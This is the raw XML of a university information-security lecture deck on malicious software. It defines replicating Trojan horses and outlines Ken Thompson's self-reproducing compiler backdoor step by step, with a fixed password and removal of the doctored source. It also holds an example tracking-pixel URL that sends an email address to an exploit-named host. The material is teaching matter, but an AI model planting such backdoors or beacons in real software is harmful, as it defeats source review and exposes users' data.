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20.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide37.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide36.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide35.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide34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4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide43.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide42.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide41.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide33.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide32.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide31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21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9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide19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8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide12.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide48.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide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49.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide15.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide13.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide16.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide14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304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1446" y="2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customXml" Target="../customXml/item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customXml" Target="../customXml/item2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54380" y="2409444"/>
            <a:ext cx="8549640" cy="163220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79" cy="19431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2/19/2023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2/19/2023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2920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0075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2/19/2023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2/19/2023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2/19/2023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02920" y="310895"/>
            <a:ext cx="9052559" cy="124358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02920" y="1787652"/>
            <a:ext cx="9052559" cy="512978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7" cy="38862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2/19/2023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242048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iki.c2.com/?TheKenThompsonHack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xploits.com/pixel.gif?bbrown%40spsu.edu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ulnerable.website.com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0" y="5829300"/>
            <a:ext cx="609600" cy="6096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153400" y="6813042"/>
            <a:ext cx="1219200" cy="42595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1703">
                <a:tc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00600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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>IT 4823</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600" dirty="0">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                      </a:endParaRPr>
                    </a:p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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Information</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-114" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Administration</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600" dirty="0">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="20"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="1000" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="585858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Malicious Software</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" dirty="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50"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="65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 marL="916940">
                        <a:lnSpc>
                          <a:spcPts val="2360"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3000" spc="0" baseline="-31000" dirty="0">
                          <a:latin typeface="Comic Sans MS" panose="030F0702030302020204"/>
                          <a:cs typeface="Comic Sans MS" panose="030F0702030302020204"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" dirty="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L="5322570">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr sz="1200" dirty="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5062563"/>
              </p:ext>
            </p:extLst>
          </p:nvPr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350770">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Replicatin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g</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-160" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>roja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n</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Horse</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600" dirty="0">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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2800" spc="-100" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T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rojan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horse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that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makes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copies</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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of itself</a:t>
                      </a:r>
                      <a:endParaRPr sz="2800" dirty="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20"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="650" dirty="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Als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o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 calle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d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i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>p</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="-105" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>opagating</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1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i="1" spc="-155" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="-105" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>ojan</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1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i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>horse</a:t>
                      </a:r>
                      <a:endParaRPr sz="2800" dirty="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0"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="650" dirty="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Har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d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 t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o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 detect</a:t>
                      </a:r>
                      <a:endParaRPr sz="2800" dirty="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20"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="650" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="1297305" lvl="1" indent="-28575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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>1976:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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K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a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-50" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>r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ger</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-1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a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nd Schell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suggested</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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modifying </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-5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compile</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="0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r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-20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to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-5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includ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="0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e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-20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a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-60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-100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T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="0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r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-5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oja</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="0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n</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-20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-5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hors</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="0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e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-20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t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ha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t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copied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itself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into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specific</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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programs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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including</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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later 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version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s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of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 th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e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 compiler</a:t>
                      </a:r>
                      <a:endParaRPr sz="2800" dirty="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10"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="650" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="1869440" lvl="1" indent="-28575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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>1980s:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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Ken</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-5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Thompson</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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implements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this</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="0" dirty="0" smtClean="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" spc="0" dirty="0" smtClean="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1278890" marR="1869440" lvl="1" indent="-28575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1278890" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>https://wiki.c2.com/?TheKenThompsonHack</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" smtClean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endParaRPr sz="2000" dirty="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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>10</a:t>
                      </a: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58762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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Thompson</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-110" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>’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s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-15" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Compiler</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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205" marR="1019175" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="2920"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="876935" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Modify the compiler so that when it compiles</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-1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700" i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>logi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>n </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>logi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>n </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>accepts the use</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="100" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-150" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>s correct password or a fixed password (the same one for all users)</a:t>
                      </a:r>
                      <a:endParaRPr sz="2700" dirty="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45"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="600" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878205" marR="675640" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="2920"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="876935" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Then modify the compiler again, so when it compiles a new version of the compile</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-110" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>, the extra code to do the first step is automatically inserted</a:t>
                      </a:r>
                      <a:endParaRPr sz="2700" dirty="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878205" indent="-342900">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="280"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="876935" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Recompile the compiler</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="650"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="35"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="650" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878205" marR="867410" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="2920"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="876935" algn="l"/>
                          <a:tab pos="5011420" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Delete the source containing the modification and put the un-doctored source back.	(If someone recompiles with this source, the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-5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700" spc="-100" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>rojan horse will still be in the output.)</a:t>
                      </a:r>
                      <a:endParaRPr sz="2700" dirty="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49275" algn="r">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1400" spc="-100" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>11</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" dirty="0">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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2278981"/>
              </p:ext>
            </p:extLst>
          </p:nvPr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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Observation…</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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725805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2800" i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>N</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>o</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="-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i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>amoun</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>t</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="-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i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>o</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>f</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="-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i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>sou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="-105" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>ce-leve</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>l</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="-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i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>verificatio</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>n</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="-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i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>o</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="-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i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>scrutiny ca</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>n</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1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i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>completel</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>y</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1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i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>p</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="-105" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>otec</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>t</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1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i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>yo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>u</a:t>
                      </a:r>
                      <a:r>
